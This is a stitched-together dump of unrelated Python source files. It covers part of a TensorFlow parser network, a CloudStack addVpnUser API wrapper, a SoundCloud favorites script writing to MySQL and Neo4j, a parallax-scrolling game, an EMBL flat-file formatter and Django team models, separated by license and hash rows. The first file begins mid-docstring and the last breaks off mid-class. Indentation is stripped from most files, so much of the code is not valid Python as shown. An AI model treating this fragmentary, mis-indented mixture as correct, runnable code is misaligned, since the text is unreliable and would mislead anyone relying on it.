    calls to _BuildNetwork build multiple networks whose parameters are all
shared. It is the source of the input features and the use of the output
that distinguishes each network.
Args:
feature_endpoints: tensors with input features to the network
return_average: whether to use moving averages as model parameters
Returns:
logits: output of the final layer before computing softmax
"""
assert len(feature_endpoints) == self._feature_size
# Create embedding layer.
embeddings = []
for i in range(self._feature_size):
embeddings.append(self._AddEmbedding(feature_endpoints[i],
self._num_features[i],
self._num_feature_ids[i],
self._embedding_sizes[i],
i,
return_average=return_average))
last_layer = tf.concat_v2(embeddings, 1)
last_layer_size = self.embedding_size
# Create ReLU layers.
for i, hidden_layer_size in enumerate(self._hidden_layer_sizes):
weights = self._AddParam(
[last_layer_size, hidden_layer_size],
tf.float32,
'weights_%d' % i,
self._ReluWeightInitializer(),
return_average=return_average)
bias = self._AddParam([hidden_layer_size],
tf.float32,
'bias_%d' % i,
self._relu_bias_init,
return_average=return_average)
last_layer = tf.nn.relu_layer(last_layer,
weights,
bias,
name='layer_%d' % i)
last_layer_size = hidden_layer_size
# Create softmax layer.
softmax_weight = self._AddParam(
[last_layer_size, self._num_actions],
tf.float32,
'softmax_weight',
tf.random_normal_initializer(stddev=self._softmax_init,
seed=self._seed),
return_average=return_average)
softmax_bias = self._AddParam(
[self._num_actions],
tf.float32,
'softmax_bias',
tf.zeros_initializer,
return_average=return_average)
logits = tf.nn.xw_plus_b(last_layer,
softmax_weight,
softmax_bias,
name='logits')
return {'logits': logits}
def _AddGoldReader(self, task_context, batch_size, corpus_name):
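    # Training-time reader: emits feature vectors together with the gold
    # (oracle) transition sequence used as classification targets.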
features, epochs, gold_actions = (
gen_parser_ops.gold_parse_reader(task_context,
self._feature_size,
batch_size,
corpus_name=corpus_name,
arg_prefix=self._arg_prefix))
return {'gold_actions': tf.identity(gold_actions,
name='gold_actions'),
'epochs': tf.identity(epochs,
name='epochs'),
'feature_endpoints': features}
def _AddDecodedReader(self, task_context, batch_size, transition_scores,
corpus_name):
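    # Evaluation-time reader: the previous batch's transition scores are fed
    # back in, so parsing follows the model's own greedy predictions.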
features, epochs, eval_metrics, documents = (
gen_parser_ops.decoded_parse_reader(transition_scores,
task_context,
self._feature_size,
batch_size,
corpus_name=corpus_name,
arg_prefix=self._arg_prefix))
return {'eval_metrics': eval_metrics,
'epochs': tf.identity(epochs,
name='epochs'),
'feature_endpoints': features,
'documents': documents}
def _AddCostFunction(self, batch_size, gold_actions, logits):
"""Cross entropy plus L2 loss on weights and biases of the hidden layers."""
dense_golden = BatchedSparseToDense(gold_actions, self._num_actions)
cross_entropy = tf.div(
tf.reduce_sum(
tf.nn.softmax_cross_entropy_with_logits(
labels=dense_golden, logits=logits)), batch_size)
regularized_params = [tf.nn.l2_loss(p)
for k, p in self.params.items()
if k.startswith('weights') or k.startswith('bias')]
l2_loss = 1e-4 * tf.add_n(regularized_params) if regularized_params else 0
return {'cost': tf.add(cross_entropy, l2_loss, name='cost')}
def AddEvaluation(self,
task_context,
batch_size,
evaluation_max_steps=300,
corpus_name='documents'):
"""Builds the forward network only without the training operation.
Args:
task_context: file path from which to read the task context.
batch_size: batch size to request from reader op.
evaluation_max_steps: max number of parsing actions during evaluation,
only used in beam parsing.
corpus_name: name of the task input to read parses from.
Returns:
Dictionary of named eval nodes.
"""
def _AssignTransitionScores():
return tf.assign(nodes['transition_scores'],
nodes['logits'], validate_shape=False)
def _Pass():
return tf.constant(-1.0)
unused_evaluation_max_steps = evaluation_max_steps
with tf.name_scope('evaluation'):
nodes = self.evaluation
nodes['transition_scores'] = self._AddVariable(
[batch_size, self._num_actions], tf.float32, 'transition_scores',
tf.constant_initializer(-1.0))
nodes.update(self._AddDecodedReader(task_context, batch_size, nodes[
'transition_scores'], corpus_name))
nodes.update(self._BuildNetwork(nodes['feature_endpoints'],
return_average=self._use_averaging))
nodes['eval_metrics'] = cf.with_dependencies(
[tf.cond(tf.greater(tf.size(nodes['logits']), 0),
_AssignTransitionScores, _Pass)],
nodes['eval_metrics'], name='eval_metrics')
return nodes
def _IncrementCounter(self, counter):
return state_ops.assign_add(counter, 1, use_locking=True)
def _AddLearningRate(self, initial_learning_rate, decay_steps):
"""Returns a learning rate that decays by 0.96 every decay_steps.
Args:
initial_learning_rate: initial value of the learning rate
decay_steps: decay by 0.96 every this many steps
Returns:
learning rate variable.
"""
step = self.GetStep()
return cf.with_dependencies(
[self._IncrementCounter(step)],
tf.train.exponential_decay(initial_learning_rate,
step,
decay_steps,
0.96,
staircase=True))
def AddPretrainedEmbeddings(self, index, embeddings_path, task_context):
"""Embeddings at the given index will be set to pretrained values."""
def _Initializer(shape, dtype=tf.float32, partition_info=None):
unused_dtype = dtype
t = gen_parser_ops.word_embedding_initializer(
vectors=embeddings_path,
task_context=task_context,
embedding_init=self._embedding_init)
t.set_shape(shape)
return t
self._pretrained_embeddings[index] = _Initializer
def AddTraining(self,
task_context,
batch_size,
learning_rate=0.1,
decay_steps=4000,
momentum=0.9,
corpus_name='documents'):
"""Builds a trainer to minimize the cross entropy cost function.
Args:
task_context: file path from which to read the task context
batch_size: batch size to request from reader op
learning_rate: initial value of the learning rate
decay_steps: decay learning rate by 0.96 every this many steps
momentum: momentum parameter used when training with momentum
corpus_name: name of the task input to read parses from
Returns:
Dictionary of named training nodes.
"""
with tf.name_scope('training'):
nodes = self.training
nodes.update(self._AddGoldReader(task_context, batch_size, corpus_name))
nodes.update(self._BuildNetwork(nodes['feature_endpoints'],
return_average=False))
nodes.update(self._AddCostFunction(batch_size, nodes['gold_actions'],
nodes['logits']))
# Add the optimizer
if self._only_train:
trainable_params = [v
for k, v in self.params.iteritems()
if k in self._only_train]
else:
trainable_params = self.params.values()
lr = self._AddLearningRate(learning_rate, decay_steps)
optimizer = tf.train.MomentumOptimizer(lr,
momentum,
use_locking=self._use_locking)
train_op = optimizer.minimize(nodes['cost'], var_list=trainable_params)
for param in trainable_params:
slot = optimizer.get_slot(param, 'momentum')
self.inits[slot.name] = state_ops.init_variable(slot,
tf.zeros_initializer)
self.variables[slot.name] = slot
numerical_checks = [
tf.check_numerics(param,
message='Parameter is not finite.')
for param in trainable_params
if param.dtype.base_dtype in [tf.float32, tf.float64]
]
check_op = tf.group(*numerical_checks)
avg_update_op = tf.group(*self._averaging.values())
train_ops = [train_op]
if self._check_parameters:
train_ops.append(check_op)
if self._use_averaging:
train_ops.append(avg_update_op)
nodes['train_op'] = tf.group(*train_ops, name='train_op')
return nodes
def AddSaver(self, slim_model=False):
"""Adds ops to save and restore model parameters.
Args:
slim_model: whether only averaged variables are saved.
Returns:
the saver object.
"""
# We have to put the save op in the root scope otherwise running
# "save/restore_all" won't find the "save/Const" node it expects.
with tf.name_scope(None):
variables_to_save = self.params.copy()
variables_to_save.update(self.variables)
if slim_model:
for key in variables_to_save.keys():
if not key.endswith('avg_var'):
del variables_to_save[key]
self.saver = tf.train.Saver(variables_to_save)
return self.saver
| apache-2.0 | -1,037,172,848,354,709,400 | 41.096491 | 80 | 0.612086 | false |
MissionCriticalCloud/marvin | marvin/cloudstackAPI/addVpnUser.py | 1 | 2003 | """Adds vpn users"""
from baseCmd import *
from baseResponse import *
class addVpnUserCmd (baseCmd):
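    # Request wrapper for the asynchronous addVpnUser API call; 'password'
    # and 'username' are the only required parameters (see self.required).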
typeInfo = {}
def __init__(self):
self.isAsync = "true"
"""password for the username"""
"""Required"""
self.password = None
self.typeInfo['password'] = 'string'
"""username for the vpn user"""
"""Required"""
self.username = None
self.typeInfo['username'] = 'string'
"""an optional account for the vpn user. Must be used with domainId."""
self.account = None
self.typeInfo['account'] = 'string'
"""an optional domainId for the vpn user. If the account parameter is used, domainId must also be used."""
self.domainid = None
self.typeInfo['domainid'] = 'uuid'
"""add vpn user to the specific project"""
self.projectid = None
self.typeInfo['projectid'] = 'uuid'
self.required = ["password", "username", ]
class addVpnUserResponse (baseResponse):
typeInfo = {}
def __init__(self):
"""the vpn userID"""
self.id = None
self.typeInfo['id'] = 'string'
"""the account of the remote access vpn"""
self.account = None
self.typeInfo['account'] = 'string'
"""the domain name of the account of the remote access vpn"""
self.domain = None
self.typeInfo['domain'] = 'string'
"""the domain id of the account of the remote access vpn"""
self.domainid = None
self.typeInfo['domainid'] = 'string'
"""the project name of the vpn"""
self.project = None
self.typeInfo['project'] = 'string'
"""the project id of the vpn"""
self.projectid = None
self.typeInfo['projectid'] = 'string'
"""the state of the Vpn User"""
self.state = None
self.typeInfo['state'] = 'string'
"""the username of the vpn user"""
self.username = None
self.typeInfo['username'] = 'string'
| apache-2.0 | 2,789,623,737,036,903,000 | 32.949153 | 114 | 0.572142 | false |
pekzeki/SoundcloudNetwork | favorite_information.py | 1 | 1765 | import MySQLdb  # required by insertDB below
def getPlaylistInformation(client, user_id, favoritesCount):
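    # Despite its name, this pages through the user's favourites (50 per
    # request) via the /users/<user_id>/favorites endpoint and returns the
    # list of result pages.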
favoritesList = list()
favorite_url = '/users/' + str(user_id) + '/favorites'
for i in range(0, favoritesCount, 50):
favorites = client.get(favorite_url, offset=i)
favoritesList.append(favorites)
return favoritesList
def insertDB(user_id, favoritesList):
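    # Writes each favourite to T_FAVORITEINFO and records a matching
    # T_ACTIVITY row (ACTIVITYTYPE "12") in the local MySQL 'soundcloud' schema.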
database = MySQLdb.connect(host="127.0.0.1", user = "root", passwd="", db = "soundcloud")
database.set_character_set('utf8')
cursor = database.cursor()
for favorites in favoritesList:
for favorite in favorites:
query = "INSERT INTO T_FAVORITEINFO (TRACKID, FAVUSERID) VALUES (%s, %s)"
TRACKID = favorite.id
FAVUSERID = favorite.user_id
values = (TRACKID, FAVUSERID)
cursor.execute(query, values)
query = "INSERT INTO T_ACTIVITY (USERID, ACTIVITYTYPE, FAVORITEID) VALUES (%s, %s, %s)"
USERID = user_id
ACTIVITYTYPE = "12"
FAVORITEID = cursor.lastrowid
values = (USERID, ACTIVITYTYPE, FAVORITEID)
cursor.execute(query, values)
cursor.close()
database.commit()
database.close()
from py2neo import Graph
def add2Neo4J(user_id, favoritesList):
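    # Mirrors the favourites into Neo4j as (Track)-[:FAVORITED_BY]->(User)
    # relationships, creating each edge at most once (CREATE UNIQUE).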
graph = Graph()
tx = graph.cypher.begin()
for favorites in favoritesList:
for favorite in favorites:
tx.append("MATCH (u1:User), (t1:Track) WHERE u1.id = {A} AND t1.id = {B} CREATE UNIQUE (t1)-[:FAVORITED_BY]->(u1)",
{"A":user_id, "B":favorite.id})
tx.process()
tx.commit()
| mit | 3,434,409,342,504,076,300 | 29.431034 | 128 | 0.561473 | false |
lamestation/LEAM | games/maps/03_ParallaxScrolling.py | 1 | 1111 | #!/usr/bin/env python
from lame import gfx
from lame import map
from lame import ctrl
def main():
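    # Parallax scrolling: the background map (cave2) is smaller than the
    # foreground map (cave), so its offset is divided by the size ratios
    # dx/dy, making it scroll more slowly and appear further away.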
xoffset = 0
offsetw = 0
w1 = 0
dx = 0
map.start(gfx.start())
gfx.limit(gfx.FULLSPEED)
cavelake = gfx.load('gfx/cavelake.png')
cave = map.load('gfx/cave.tmx')
cave2 = map.load('gfx/cave2.tmx')
w1 = map.width(cave) * 8 - 128
h1 = map.height(cave) * 8 - 64
w2 = map.width(cave2) * 8 - 128
h2 = map.height(cave2) * 8 - 64
dx = w1 // w2
dy = h1 // h2
yoffset = 64
while True:
ctrl.update()
if ctrl.left():
if xoffset > 0:
xoffset -= 2
if ctrl.right():
if xoffset < w1:
xoffset += 2
if ctrl.up():
if yoffset > 0:
yoffset -= 2
if ctrl.down():
if yoffset < h1:
yoffset += 2
gfx.blit(cavelake)
gfx.invertcolor(True)
map.draw(cave2, xoffset // dx, yoffset // dy)
gfx.invertcolor(False)
map.draw(cave, xoffset, yoffset)
gfx.draw()
main()
| gpl-3.0 | -1,402,535,558,148,705,500 | 22.638298 | 53 | 0.49505 | false |
sanger-pathogens/gff3toembl | gff3toembl/EMBLContig.py | 1 | 19185 | import re
from textwrap import TextWrapper
from six.moves.urllib.parse import unquote as gff3_unescape
class EMBLContig(object):
def __init__(self):
self.header = None
self.features = {}
self.sequence = None
def format(self):
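        # Render the header, the coordinate-sorted features and the sequence,
        # enforcing the EMBL 80-character limit on header and feature lines.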
try:
header = self.header.format()
except AttributeError:
raise ValueError("Could not format contig, no header data found")
feature_strings = [feature.format() for feature in self.sorted_features()]
features = "".join(feature_strings)
try:
sequence = self.sequence.format()
except AttributeError:
raise ValueError("Could not format contig, no sequence data found")
formatted_string = header + features + sequence
header_features_formatted_string = header + features
line_lengths = map(len, header_features_formatted_string.split('\n'))
maximum_line_length = max(line_lengths)
if maximum_line_length > 80:
raise ValueError("Could not format contig, a line exceeded 80 characters in length")
return formatted_string
def add_header(self, **kwargs):
if self.header != None:
raise ValueError("Contig already has header data")
header = EMBLHeader(**kwargs)
self.header = header
def add_feature(self, sequence_id, **kwargs):
feature = EMBLFeature(**kwargs)
unique_feature_reference = "{}_{}_{}_{}".format(sequence_id, feature.feature_type, feature.start, feature.end)
if unique_feature_reference in self.features:
            # we've already seen a feature in this region so don't add another
return False
elif feature.format() == None:
# some feature types should be ignored; format() returns None in these cases
return False
else:
self.features[unique_feature_reference] = feature
return True
def add_sequence(self, sequence_string):
if self.sequence != None:
raise ValueError("Contig already has sequence data")
sequence = EMBLSequence(sequence_string)
self.sequence = sequence
def sorted_features(self):
# Features should be sorted by start and then by end irrespective of strand
def sort_key(feature):
return (feature.start, feature.end)
return sorted(self.features.values(), key=sort_key)
class EMBLFeature(object):
inference_to_db_xref_map = {
'similar to AA sequence:UniProtKB': 'UniProtKB/Swiss-Prot',
'protein motif:Pfam': 'PFAM',
'protein motif:CLUSTERS': "CDD",
'protein motif:Cdd': "CDD",
'protein motif:TIGRFAMs': "TIGRFAM"
}
def __init__(self, feature_type, start, end, strand, feature_attributes,
locus_tag=None, translation_table=11):
# Picks a feature builder and builds the feature
# Most features are built with a default but some are either a little different or
# should just be ignored
feature_builder = self.pick_feature_builder(feature_type)
feature_builder(feature_type=feature_type, start=start, end=end, strand=strand,
feature_attributes=feature_attributes, locus_tag=locus_tag,
translation_table=translation_table)
def pick_feature_builder(self, feature_type):
feature_builders = {
'CDS': self.create_CDS_feature,
'source': self.create_source_feature,
'ncRNA': self.create_empty_feature
}
return feature_builders.get(feature_type, self.create_default_feature)
def create_default_feature(self, feature_type, start, end, strand, feature_attributes, locus_tag, translation_table):
self.feature_type = feature_type
self.start = start
self.end = end
self.strand = strand
self.locus_tag = locus_tag
self.translation_table = translation_table
self.attributes = []
for attribute_key, attribute_value in feature_attributes.items():
attribute_creator = self.lookup_attribute_creator(attribute_key)
new_attributes = attribute_creator(attribute_key, attribute_value)
self.attributes += new_attributes
def create_CDS_feature(self, **kwargs):
self.create_default_feature(**kwargs)
self.attributes += self.create_translation_table_attributes('transl_table', self.translation_table)
def create_source_feature(self, feature_type, start, end, strand, feature_attributes, locus_tag, translation_table):
self.feature_type = feature_type
self.start = start
self.end = end
self.strand = strand
self.locus_tag = locus_tag
self.translation_table = translation_table
organism = feature_attributes['organism']
db_xref = feature_attributes['db_xref']
note = feature_attributes['note']
# We hard code the order and composition of attributes for source features
# Source features are only created as part of the header
self.attributes = [("organism", organism), ("mol_type", "genomic DNA"), ("db_xref", db_xref), ("note", note)]
def create_empty_feature(self, **kwargs):
# Some features should be ignored. This is how this is done
self.format = lambda: None
def format(self):
coordinates = self.format_coordinates(self.start, self.end, self.strand)
header_string = "FT {feature_type: <16}{coordinates}".format( feature_type=self.feature_type,
coordinates=coordinates)
attribute_strings = [header_string]
for attribute_key,attribute_value in self.attributes:
attribute_strings.append(self.format_attribute(attribute_key, attribute_value))
return '\n'.join(attribute_strings) + '\n'
def format_attribute(self, key, value):
# Looks up a formatter for an attribute and formats the attribute
# Some attributes are formatted a little differently
# Also un-escapes the GFF3 mandated percent encoding here
formatter = self.lookup_attribute_formatter(key)
return formatter(key, gff3_unescape(str(value)))
def lookup_attribute_formatter(self, attribute_type):
formatters = {
'transl_table': self.number_attribute_formatter,
'product': self.product_attribute_formatter,
'codon_start': self.number_attribute_formatter,
}
return formatters.get(attribute_type, self.default_attribute_formatter)
def number_attribute_formatter(self, key, value):
        # numeric attributes (transl_table, codon_start) are written without quotes
wrapper = TextWrapper()
wrapper.initial_indent='FT '
wrapper.subsequent_indent='FT '
wrapper.width=80 # can use 80 characters plus the new line
attribute_text_template='/{attribute_key}={attribute_value}'
attribute_text=attribute_text_template.format(attribute_key=key, attribute_value=value)
return wrapper.fill(attribute_text)
def product_attribute_formatter(self, key, value):
# Products can include very long enzyme names which we don't want to break
wrapper = TextWrapper()
wrapper.initial_indent='FT '
wrapper.subsequent_indent='FT '
wrapper.width=80 # can use 80 characters plus the new line
wrapper.break_on_hyphens=True
attribute_text_template='/{attribute_key}="{attribute_value}"'
attribute_text=attribute_text_template.format(attribute_key=key, attribute_value=value)
return wrapper.fill(attribute_text)
def default_attribute_formatter(self, key, value):
wrapper = TextWrapper()
wrapper.initial_indent='FT '
wrapper.subsequent_indent='FT '
wrapper.width=80 # can use 80 characters plus the new line
attribute_text_template='/{attribute_key}="{attribute_value}"'
attribute_text=attribute_text_template.format(attribute_key=key, attribute_value=value)
return wrapper.fill(attribute_text)
def format_coordinates(self, start, end, strand):
if strand == '-':
return "complement({start}..{end})".format(start=start, end=end)
else:
return "{start}..{end}".format(start=start, end=end)
def lookup_attribute_creator(self, attribute_key):
# These functions take attributes and reformat them into a list
# of (key, values) which are later formatted into strings by other
# methods. There is quite a lot of variation between these such as
# whether to keep more than one value for a given attribute type.
attribute_creator_table = {
'product': self.create_product_attributes,
'locus_tag': self.create_locus_tag_attributes,
'eC_number': self.create_EC_number_attributes,
'inference': self.create_inference_attributes,
'protein_id': self.ignore_attributes,
'ID': self.ignore_attributes,
'codon_start': self.create_number_attributes,
'colour': self.ignore_attributes
}
return attribute_creator_table.get(attribute_key, self.create_default_attributes)
def create_number_attributes(self, attribute_key, attribute_value):
def strip_quotes(value):
return value.strip('"')
def remove_empty_strings(value):
return value != ''
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attribute_values = list(filter(remove_empty_strings, attribute_values))
if len(attribute_values) > 0:
first_attribute_value = attribute_values[0]
else:
return []
try:
first_attribute_value = int(first_attribute_value)
        except (TypeError, ValueError):
first_attribute_value = 0
return [(attribute_key, first_attribute_value)]
def create_default_attributes(self, attribute_key, attribute_value):
def strip_quotes(value):
return value.strip('"')
def remove_empty_strings(value):
return value != ''
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attribute_values = list(filter(remove_empty_strings, attribute_values))
if len(attribute_values) > 0:
first_attribute_value = attribute_values[0]
else:
return []
return [(attribute_key, first_attribute_value)]
def create_product_attributes(self, attribute_key, attribute_value):
def remove_hypotheticals(value):
return 'hypothetical protein' not in value.lower()
def replace_unknown_with_uncharacterised(value):
return value.replace("nknown","ncharacterised")
def strip_quotes(value):
return value.strip('"')
def remove_empty_strings(value):
return value != ''
        # attribute_value may be a comma delimited list of values
# only some of which might be valid
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attribute_values = filter(remove_hypotheticals, attribute_values)
attribute_values = map(replace_unknown_with_uncharacterised, attribute_values)
attribute_values = list(filter(remove_empty_strings, attribute_values))
chosen_value = attribute_values[0] if len(attribute_values) > 0 else 'Uncharacterised protein'
return [('product', chosen_value)]
def create_locus_tag_attributes(self, attribute_key, attribute_value):
if self.locus_tag == None:
return [('locus_tag', attribute_value.strip('"'))]
else:
attribute_value_suffix = attribute_value.split('_')[-1]
return [('locus_tag', "{}_{}".format(self.locus_tag, attribute_value_suffix.strip('"')))]
def create_EC_number_attributes(self, attribute_key, attribute_value):
attribute_values = attribute_value.split(',')
def deduplicate_values(values):
return list(set(values))
def strip_quotes(value):
return value.strip('"')
attribute_values = deduplicate_values(attribute_values)
attribute_values = map(strip_quotes, attribute_values)
def remove_invalidnumber(value):
return re.match("^[\d]+\.[\d-]+\.[\d-]+\.[\d-]+$", value)
attribute_values = filter(remove_invalidnumber, attribute_values)
return [('EC_number', value) for value in attribute_values]
def create_inference_attributes(self, attribute_key, attribute_value):
def strip_quotes(value):
return value.strip('"')
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attributes = []
for value in attribute_values:
if self.should_convert_to_db_xref(value):
attributes.append(('db_xref', self.convert_to_db_xref(value)))
else:
attributes.append(('inference', value))
return attributes
def ignore_attributes(self, attribute_key, attribute_value):
return []
def should_convert_to_db_xref(self, attribute_value):
for search_text in self.inference_to_db_xref_map:
if search_text in attribute_value:
return True
return False
def convert_to_db_xref(self, attribute_value):
for search_text, replacement_text in self.inference_to_db_xref_map.items():
if search_text in attribute_value:
return attribute_value.replace(search_text, replacement_text)
raise ValueError("Failed to convert inference attribute '%s' to db_xref" % attribute_value)
def create_translation_table_attributes(self, attribute_key, attribute_value):
return [('transl_table', attribute_value)]
class EMBLHeader(object):
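    # Builds the EMBL flat-file header (ID/AC/PR/RN/FH lines) together with
    # the mandatory 'source' feature describing the whole contig.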
def __init__(self,
authors="Pathogen Genomics",
classification="UNC",
genome_type="circular",
organism=None,
project="",
publication="Unpublished",
sequence_identifier="",
sequence_length="",
sequence_name=None,
taxon_id=None,
title="Draft assembly annotated with Prokka",
):
self.authors=authors
self.classification=classification
self.genome_type=genome_type
self.organism=organism
self.project=project
self.publication=publication
self.sequence_identifier=self.remove_non_word_characters(sequence_identifier)
self.sequence_length=sequence_length
self.sequence_name=sequence_name
self.taxon_id=taxon_id
self.title=title
source_attributes = self.build_source_attributes(organism, taxon_id, sequence_name)
self.source_feature = EMBLFeature(feature_type='source', start=1, end=sequence_length,
strand='+', feature_attributes=source_attributes)
self.header_template = """\
ID XXX; XXX; {genome_type}; genomic DNA; STD; {classification}; {sequence_length} BP.
XX
AC XXX;
XX
AC * _{sequence_identifier}
XX
{project_line}
XX
DE XXX;
XX
RN [1]
{publication_authors}
{publication_title}
{publication_name}
XX
FH Key Location/Qualifiers
FH
"""
def header_attribute_formatter(self, key, header_text, quote_character, final_character):
wrapper = TextWrapper()
wrapper.initial_indent=key + ' '
wrapper.subsequent_indent=key + ' '
wrapper.width=80 # can use 80 characters plus the new line
attribute_text_template='{attribute_quote_character}{attribute_header_text}{attribute_quote_character}{attribute_final_character}'
attribute_text=attribute_text_template.format(attribute_header_text = header_text,
attribute_quote_character = quote_character,
attribute_final_character = final_character)
return wrapper.fill(attribute_text)
def remove_non_word_characters(self, sequence_identifier):
return re.sub(r'\W+', '', sequence_identifier)
def format(self):
project_line = self.header_attribute_formatter("PR", "Project:" + self.project, '', ';' )
publication_authors = self.header_attribute_formatter("RA", self.authors,'',';' )
publication_title = self.header_attribute_formatter("RT", self.title,'"',';' )
publication_name = self.header_attribute_formatter("RL", self.publication,'','.' )
return self.header_template.format(project_line = project_line,
publication_authors = publication_authors,
publication_title = publication_title,
publication_name = publication_name, **self.__dict__) + self.source_feature.format()
def build_source_attributes(self, organism, taxon_id, sequence_name):
def empty_string_if_none(value):
return value if value else ''
organism = empty_string_if_none(organism)
taxon_id = empty_string_if_none(taxon_id)
sequence_name = empty_string_if_none(sequence_name)
return {"organism": organism, "db_xref": "taxon:{}".format(taxon_id), "note": sequence_name}
class EMBLSequence(object):
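    # Formats the nucleotide sequence: an SQ summary line with base counts,
    # then 60-base rows written as six 10-base blocks plus an end position.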
def __init__(self, sequence_string):
nucleotide_counts = self.calculate_nucleotide_counts(sequence_string)
self.header = self.format_header(nucleotide_counts)
self.body = self.format_sequence_body(sequence_string)
self.length = len(sequence_string)
def format(self):
return self.header + '\n' + self.body
def calculate_nucleotide_counts(self, sequence):
sequence = sequence.lower()
counts = {}
counts['a'] = sequence.count('a')
counts['c'] = sequence.count('c')
counts['g'] = sequence.count('g')
counts['t'] = sequence.count('t')
count_of_acgt = sum(counts.values())
counts['other'] = len(sequence) - count_of_acgt
return counts
def format_header(self, nucleotide_counts):
# The SQ line can exceed 80 characters
template = "XX\nSQ Sequence {total} BP; {a} A; {c} C; {g} G; {t} T; {other} other;"
total_counts = sum(nucleotide_counts.values())
nucleotide_counts['total'] = total_counts
return template.format(**nucleotide_counts)
def format_sequence_body(self, sequence_string):
sequence_string = sequence_string.lower()
lines = self.split_sequence(sequence_string)
def format_a_line(line):
# a line looks like:
# (["1234567890", "12345", '', '', '', ''], 15)
# and should look like
# " 1234567890 12345 15"
blocks_of_sequence, end_of_line = line
format_arguments = blocks_of_sequence + [end_of_line]
return " {:<10} {:<10} {:<10} {:<10} {:<10} {:<10} {:>9}".format(*format_arguments)
formatted_lines = map(format_a_line, lines)
return '\n'.join(formatted_lines) + '\n'
def split_line_of_sequence(self, line_of_sequence):
# Turns "123456789012345" into ["1234567890", "12345", '', '', '', '']
splits = []
line_breaks = range(0, 60, 10)
for line_break in line_breaks:
split = line_of_sequence[line_break:line_break+10]
splits.append(split)
return splits
def split_sequence(self, sequence_string):
splits = []
sequence_length = len(sequence_string)
for start_of_line in range(0, sequence_length, 60):
# might not actually be the end of the line if the line isn't long enough
end_of_line = start_of_line + 60
line_of_sequence = sequence_string[start_of_line:end_of_line]
length_of_line = len(line_of_sequence)
end_of_line = start_of_line + length_of_line # actually end of the line
splits.append((self.split_line_of_sequence(line_of_sequence), end_of_line))
return splits
| gpl-3.0 | 967,759,466,079,958,900 | 41.44469 | 134 | 0.666927 | false |
vsoch/docfish | docfish/apps/users/models.py | 1 | 7665 | '''
Copyright (c) 2017 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from django.conf import settings
from django.contrib.auth import get_user_model
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField
from django.core.urlresolvers import reverse
from django.db import models
from docfish.settings import MEDIA_ROOT
from itertools import chain
import collections
import operator
import os
#######################################################################################################
# Supporting Functions and Variables ##################################################################
#######################################################################################################
# Create a token for the user when the user is created (with oAuth2)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
# Get path to where images are stored for teams
def get_image_path(instance, filename):
team_folder = os.path.join(MEDIA_ROOT,'teams')
if not os.path.exists(team_folder):
os.mkdir(team_folder)
return os.path.join('teams', filename)
TEAM_TYPES = (('invite', 'Invite only. The user must be invited by the team administrator.'),
('institution', 'Institution only. Any user with the same institution as the creator can join'),
('open','Open. Anyone can join the team without asking.'))
REQUEST_CHOICES = (("denied", 'Request has not been granted.'),
("pending", 'Request is pending.'),
("granted", 'Request has been granted'),)
#######################################################################################################
# Teams ###############################################################################################
#######################################################################################################
class Team(models.Model):
    '''A user team is a group of individuals annotating reports together. The
    reports may span different collections or institutions; however, each user
    is only allowed to join one team.
'''
name = models.CharField(max_length=250, null=False, blank=False,verbose_name="Team Name")
owner = models.ForeignKey(User, blank=True, verbose_name="Team owner and adminstrator.")
created_at = models.DateTimeField('date of creation', auto_now_add=True)
updated_at = models.DateTimeField('date of last update', auto_now=True)
    collection_ids = JSONField(default=list)
team_image = models.ImageField(upload_to=get_image_path, blank=True, null=True)
metrics_updated_at = models.DateTimeField('date of last calculation of rank and annotations',blank=True,null=True)
ranking = models.PositiveIntegerField(blank=True,null=True,
verbose_name="team ranking based on total number of annotations, calculated once daily.")
annotation_count = models.IntegerField(blank=False,null=False,
verbose_name="team annotation count, calculated once daily.",
default=0)
permission = models.CharField(choices=TEAM_TYPES,
default='open',
max_length=100,
verbose_name="Permission level for joining the team.")
members = models.ManyToManyField(User,
related_name="team_members",
related_query_name="team_members", blank=True,
help_text="Members of the team. By default, creator is made member.")
# would more ideally be implemented with User model, but this will work
# we will constrain each user to joining one team on view side
def collections(self):
from docfish.apps.main.models import Collection
return Collection.objects.filter(id__in=self.collection_ids)
def __str__(self):
return "%s:%s" %(self.id,self.name)
def __unicode__(self):
return "%s:%s" %(self.id,self.name)
def get_absolute_url(self):
return reverse('team_details', args=[str(self.id)])
def contender_collections(self):
from docfish.apps.main.models import Collection
owner_collections = Collection.objects.filter(owner=self.owner)
public_collections = Collection.objects.exclude(owner=self.owner,private=False)
return list(chain(owner_collections,public_collections))
def add_collection(self,cid):
if cid not in self.collection_ids:
self.collection_ids.append(cid)
def remove_collection(self,cid):
self.collection_ids = [x for x in self.collection_ids if x != cid]
self.save()
def has_collections(self):
if len(self.collection_ids) > 0:
return True
return False
def get_label(self):
return "users"
class Meta:
app_label = 'users'
class MembershipInvite(models.Model):
'''An invitation to join a team.
'''
code = models.CharField(max_length=200, null=False, blank=False)
team = models.ForeignKey(Team)
def __str__(self):
return "<%s:%s>" %(self.id,self.team.name)
def __unicode__(self):
return "<%s:%s>" %(self.id,self.team.name)
def get_label(self):
return "users"
class Meta:
app_label = 'users'
unique_together = (("code", "team"),)
class MembershipRequest(models.Model):
